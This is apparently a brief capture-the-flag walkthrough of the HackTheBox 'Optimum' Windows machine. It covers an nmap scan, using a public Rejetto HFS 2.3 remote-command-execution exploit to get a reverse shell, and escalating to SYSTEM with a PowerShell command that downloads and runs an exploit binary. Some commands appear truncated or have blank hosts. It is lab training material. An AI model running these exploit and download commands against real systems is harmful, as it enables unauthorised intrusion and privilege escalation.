An easy Windows box from HackTheBox, running a CVE POC to get initial access, and then another POC to get SYSTEM.



Runnning the usual nmap

sudo nmap -sC -sV -oA nmap/optimum
Nmap scan report for  
Host is up (0.038s latency).  
Not shown: 999 filtered tcp ports (no-response)  
80/tcp open  http    HttpFileServer httpd 2.3  
|_http-title: HFS /  
|_http-server-header: HFS 2.3  
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

See there is a service called “HTTP File Server” on port 80, version 2.3 - run a searchsploit against it

searchsploit httpfileserver 2.3

And find that there is a RCE for the version, with a python script

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)


Download the exploit to current directory, and run it like so

python 80 "ping"

With tcpdump listening for pings

sudo tcpdump icmp

The one from searchsploit didn’t work, but using another python script off of exploitdb it worked, it had a reverse shell baked in as well - now have shell on the system as “kostas”

Get the system info of the machine with


And save the out put to a txt file, and run it against windows exploit suggester after updating it

wes -u

wes sysinfo

To find the system vulnerable to MS16-098

Download the exe exploit from github, put it on the box and execute

powershell -c "(new-object System.Net.WebClient).DownloadFile('','C:\Users\kostas\Desktop\41020.exe  
powershell 39719.ps1

And are now system!